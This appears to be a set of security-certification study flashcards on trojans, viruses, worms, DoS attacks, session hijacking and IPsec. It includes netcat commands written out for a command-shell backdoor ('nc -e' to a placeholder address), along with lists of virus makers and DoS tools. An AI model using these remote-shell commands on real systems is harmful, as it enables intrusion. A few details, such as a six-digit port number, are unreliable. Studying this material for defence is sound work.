Trojans and other Attacks Flashcards
Malware
Software designed to harm or secretly access a computer system without the owner’s informed consent. Computer contaminant
Malvertising
Embedding malware into ad networks
Malware Delivery
Downloaded from the Internet
Drive by downloading
Hijacking of peer to peer applications
Email attachment
Overt Channels
Legitimate communication channels
Covert Channels
Used to transport data in unintended ways
Wrappers
Programs that allow you to bind a trojan to an innocent file
Crypters
Software tools that use a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products. FUD = fully undetectable
Packers
Use compression to pack the malware executable, making it harder for antivirus engines to detect. Extraction occurs in memory and not on disk.
Trojan Exploit Kits
Infinity
Bleeding Life
Crimepack
Blackhole Exploit Kit
Trojan
Embedded malicious code in an otherwise normal application
Types of Trojans
Defacement trojan
Proxy server trojan
Botnet trojan (Tor-based Chewbacca and Skynet)
Remote Access trojan (RAT, MoSucker, Optix Pro, Blackhole)
E-banking trojan (Zeus, SpyEye)
Covert Channel Tunneling Trojan (CCTT)
A form of remote access trojan that uses a variety of exploitation techniques to create data transfer channels in previously authorized data streams. Designed to provide an external shell from within the internal environment.
Command shell trojan
Provides a backdoor to the system that you connect to via command-line access. Netcat, for example: nc -e IPaddress port#
The -t option will provide telnet negotiation
Example: nc -l -p 5555 opens a port in a listening state, and nc IPaddress -p 5555 connects to the target machine with a telnet-like connection
Netcat can be used for outbound or inbound connections over TCP or UDP, to or from any port on the machine. It offers DNS forwarding, port mapping and forwarding and proxying. It can also be used as a port scanner.
Trojan Ports
- Death - 2
- Senna Spy - 20
- Hackers Paradise - 31,456
- TCP Wrappers - 421
- Doom, Satanz Backdoor - 666
- Silencer, WebEx - 1001
- RAT - 1095-98
- SubSeven - 1243
- Shivka-Burka - 1600
- Trojan Cow - 2001
- Deep Throat - 6670-71
- Tini - 7777
- Netbus - 12345, 12346
- Whack a Mole - 12361-12363
- Back Orifice - 31337, 313338
Use netstat -an to monitor listening ports; netstat -b displays all active connections and the processes using them
Neverquest Trojan
Targets banking websites. Designed to steal credentials and sensitive information and to set up VNC remote access on targets
Port monitoring tools
- Fport - shows the same info as netstat -an but also maps ports to running processes and PIDs
- What's Running
- TCPView
- IceSword
- CurrPorts
- Process Explorer
Registry monitoring tools
SysAnalyzer, Tiny Watcher, Active Registry Monitor, Regshot, Malwarebytes
Service monitoring
Windows Service Manager
Service Manager Plus
Smart Utility
Verifying the integrity of system files - can act as a HIDS for trojans
Tripwire
Sigverif - creates c:\windows\system32\sigverif.txt
Virus
Self-replicating program that reproduces its code by attaching copies of itself to other executable code
Can be distributed through virus hoaxes and fake antivirus programs
Ransomware
Malicious software designed to deny access to a computer until a ransom is paid
Wannacry
Ransomware that took advantage of an unpatched SMBv1 vulnerability using the exploit known as EternalBlue
Ransomware programs
Cryptorbit
Cryptolocker
CryptoDefense
Boot sector virus
Also known as a system virus, this virus type actually moves the boot sector to another location on the hard drive, forcing the virus code to be executed first
Petya ransomware overwrote the master boot record
Shell virus
Wraps itself around an application’s code, inserting its own code before the application’s
Cluster virus
Modifies directory table entries so that user or system processes are pointed to the virus code itself instead of the application
Multipartite virus
Attempts to infect both files and the boot sector at the same time; refers to a virus with multiple infection vectors.
Macro virus
Usually written with Visual Basic for Applications (VBA), infects template files created by Microsoft Office apps. Melissa virus was a macro virus
Polymorphic code virus
Mutates its code using a built-in polymorphic engine. Difficult to find and remove because its signature constantly changes.
Encryption virus
Uses encryption to hide the code from antivirus scanners
Metamorphic virus
Rewrites itself every time it infects a new file
Stealth virus
Also known as a tunneling virus; evades AV by intercepting the AV's requests to the operating system and altering the response so the file appears uninfected to the AV
Cavity virus
Overwrites portions of host files using the null-content sections so as not to increase the actual size of the file
Sparse infector virus
Infects only occasionally, for example only every tenth time an application is run
File extension virus
Changes the extensions of files to take advantage of the fact that file extensions are hidden by default. readme.txt.vbs looks like readme.txt when file extensions are not being shown
Create your own virus
Sonic Bat
PoisonVirus Maker
Sam's Virus Generator
JPS Virus Maker
Worm
Self-replicating malware program that uses a network to send copies of itself to other systems. Normally it doesn't alter files, but it resides in memory and duplicates itself, eating up resources.
Conficker worm
Disabled services, denied access to administrator shared drives, locked users out of directories, and restricted access to security-related sites.
Ghost eye worm
Hacking tool that uses random messaging on Facebook and other sites to perform a host of malicious efforts
Code Red worm
Exploited indexing software on IIS servers in 2001. Used a buffer overflow and defaced thousands of servers
Darlloz
Worm for IoT. Linux-based worm that targets devices running ARM, MIPS and PowerPC architectures, normally routers, set-top boxes and security cameras
Nimda
Modified and touched nearly all web content on a machine. Was the most widespread worm in history. Nimda spread through email, open network shares, and websites and took advantage of backdoors left on machines infected by the Code Red worms.
Slammer
SQL Slammer was a denial-of-service worm attacking buffer overflow weaknesses in Microsoft SQL Server. Also called Sapphire, SQL_HEL, and Helkern; it spread quickly using UDP and its small size (it fit inside a single packet)
Bug Bear
Propagated over open network shares and email. Terminated AV applications and set up a backdoor for later use. Also included a keylogger
Pretty Park
Spread via email and took advantage of IRC to propagate stolen passwords. Often displayed a 3D Pipe screensaver.
Analyzing malware
Use a virtual machine with the NIC in host-only mode and open shares. Analyze the malware statically using tools like BinText and UPX to examine the binary itself as well as the compression and packing techniques. Then execute the malware and check the processes in place (with Process Monitor and Process Explorer). Review network traffic using NetResident, TCPView, or Wireshark. Tools for malware analysis include IDA Pro, VirusTotal, Anubis, and ThreatAnalyzer.
Sheepdip System
A standalone computer that is set up to check physical media, device drivers, and other files for malware before it is introduced to a network. Normally configured with a couple of different AV programs, port monitors, registry monitors, and file integrity verifiers.
Netizen
Cybercitizen, a person actively involved in online communities
Technorati
blog search engine
Distributed Denial of Service (DDoS) attack
DoS launched from many systems, normally part of a botnet
Botnet
A network of zombie computers the hacker can use to start a distributed denial of service attack
Botnet software
Shark, Poison Ivy. The preferred communication channel used to signal the bots is Internet Relay Chat (IRC) or Internet Chat Query (ICQ); could also be HTTP or HTTPS
Categories of DOS/DDOS
- Fragmentation attacks - take advantage of the system's ability to reconstruct fragmented packets
- Volumetric attacks - also known as bandwidth attacks, these consume all available bandwidth for the system or service
- Application attacks - consume the resources necessary for the application to run
TCP state exhaustion attacks
Goes after load balancers, firewalls, and application servers by attempting to consume their connection state tables
SYN attack
Sending thousands of SYN packets to the victim with a false source IP address. Eventually all the resources are consumed
SYN flood
Sending thousands of SYN packets to the victim but not responding to the SYN/ACK. Also consumes all resources on the victim, which has to leave each connection open waiting for a response that never arrives.
ICMP flood
Sending thousands of ICMP echo packets to the target with a false source IP address.
Smurf
Sending thousands of ping requests to a subnet broadcast address with the source IP of the target. Fraggle attack is similar but uses UDP
Ping of Death
The attacker fragments an ICMP message to a target. When the fragments are reassembled, the resultant ICMP packet is larger than the maximum size and crashes the system.
Teardrop
A large number of garbled IP fragments with overlapping, oversized payloads are sent to the target machine. On older Microsoft OS this would cause a crash.
Peer to peer
Clients of a peer-to-peer hub are disconnected and directed to connect to a target system
Permanent
Phlashing causes permanent damage to a system, normally by overwriting firmware. Also known as bricking a system.
LAND attack
Sends a SYN packet to the target with the source IP spoofed to the target's own IP. The target will loop endlessly and crash the OS.
DOS/DDOS tools
Low Orbit Ion Cannon (LOIC) - can flood a target with TCP, UDP, or HTTP requests
Trinity - Linux-based
Tribe Flood Network - uses a botnet
R-U-Dead-Yet (RUDY) - performs DoS with HTTP POST via a long form field
Slowloris - TCP DoS tool that ties up open sockets and causes services to hang. Useful against web servers
DOS/DDOS countermeasures
- Disabling unnecessary services
- Good firewall policy
- Patching
- Use a good NIDS
- Skydance - can detect a DoS
- Network ingress filtering and auditing
Session Hijacking
Refers to stealing an active TCP session from a client. The server is not aware, and the client reconnects using a different session.
- Sniff the traffic between the client and the server
- Monitor the traffic and predict the sequence numbering
- Desynchronize the session with the client by sending a TCP RST, or FIN.
- Predict the session token
- Take over the session by pretending to be the client to the server. Inject packets to the target server
Session hijacking can be done via brute force, calculation, or stealing.
Sequence numbers increment on acknowledgment. An acknowledgment of 105 with a window size of 200 means you could expect sequence numbering from 105 through 305
Session hijacking tools
- Ettercap
- Hunt - can sniff, hijack and reset connections
- T-sight
- Zaproxy
- Paros - also a proxy
- Burp Suite
- Juggernaut
- Hamster
- Ferret
Man in the browser
When an attacker uses a trojan to intercept browser calls, sitting between the browser and its libraries, allowing the attacker to watch and interact with a browser session.
Session hijacking countermeasures
Use unpredictable session IDs
Limit incoming connections
Minimize remote access
Regenerate the session key after authentication is complete
Use encryption to protect the channel (IPSEC is an option)
IPSEC
Secures traffic by providing encryption and authentication services to each packet. Works in one of two modes:
- Transport mode - the payload and ESP trailer are encrypted but the original IP header is not. Can be used in a NAT network
- Tunnel mode - the whole packet, including the original IP header, is encrypted, making it incompatible with NAT
IPSEC Authentication Header (AH)
Guarantees the integrity and authentication of the IP packet sender
IPSEC Encapsulating Security Payload (ESP)
Provides origin authenticity and integrity and can also encrypt. In transport mode ESP does not provide integrity and authentication for the entire IP packet, but in tunnel mode protection is provided to the entire IP packet
Internet Key Exchange (IKE)
IKE produces the encryption keys
Oakley
Uses Diffie-Hellman to create master and session keys
Internet Security Association Key Management Protocol (ISAKMP)
Facilitates encryption between two endpoints
Spectre and Meltdown
Attacks that took advantage of speculative execution in processors